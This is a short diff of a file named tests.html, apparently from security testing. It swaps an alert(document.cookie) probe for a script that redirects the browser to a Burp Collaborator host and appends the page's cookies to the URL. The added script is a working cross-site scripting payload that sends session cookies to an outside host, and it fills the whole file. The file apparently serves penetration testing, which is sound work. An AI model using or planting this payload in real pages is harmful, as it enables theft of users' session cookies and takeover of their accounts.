--- a/tests.html
+++ b/tests.html
@@ -1,1 +1,3 @@
-<script>alert(document.cookie);</script>
+<html><script type="text/javascript">
+document.location='http://255p5s3irwtmnasubzavi3tk1b76vv.burpcollaborator.net?c='+document.cookie;
+  </script></html>
